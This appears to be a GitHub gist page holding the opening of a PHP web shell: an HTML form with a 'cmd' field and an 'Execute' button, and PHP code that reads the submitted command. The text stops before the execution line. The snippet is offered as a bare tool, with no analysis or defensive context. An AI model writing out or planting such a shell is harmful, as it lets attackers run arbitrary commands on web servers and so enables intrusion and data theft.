Skip to content

Instantly share code, notes, and snippets.

View gisdian's full-sized avatar

Diana Grace Cinco gisdian

  • 10:48 (UTC -12:00)
View GitHub Profile
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{